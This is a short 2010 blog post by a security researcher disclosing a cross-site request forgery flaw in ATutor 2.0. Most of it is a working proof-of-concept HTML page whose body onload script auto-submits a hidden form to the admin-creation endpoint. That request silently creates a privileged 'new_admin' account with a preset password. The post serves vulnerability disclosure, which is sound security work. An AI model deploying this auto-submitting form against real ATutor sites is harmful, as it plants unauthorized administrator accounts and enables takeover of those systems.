This site is soon to be deprecated by http://www.johnleitch.net

Monday, July 5, 2010

ATutor 2.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in ATutor 2.0 can be exploited to create a new admin (new_admin/Password1).

PoC
<html>
    <body onload="document.forms[0].submit.click()">
        <form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">
            <input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />
            <input type="hidden" name="password_error" value="" />
            <input type="hidden" name="login" value="new_admin" />
            <input type="hidden" name="password" value="" />
            <input type="hidden" name="confirm_password" value="" />
            <input type="hidden" name="real_name" value="" />
            <input type="hidden" name="email" value="x@x.com" />
            <input type="hidden" name="priv_admin" value="1" />
            <input type="submit" name="submit" value="Save" />          
        </form>
    </body>
</html>
Posted by John Leitch at 9:37 AM
Labels: , ,

3 comments:

Subscribe to: Post Comments (Atom)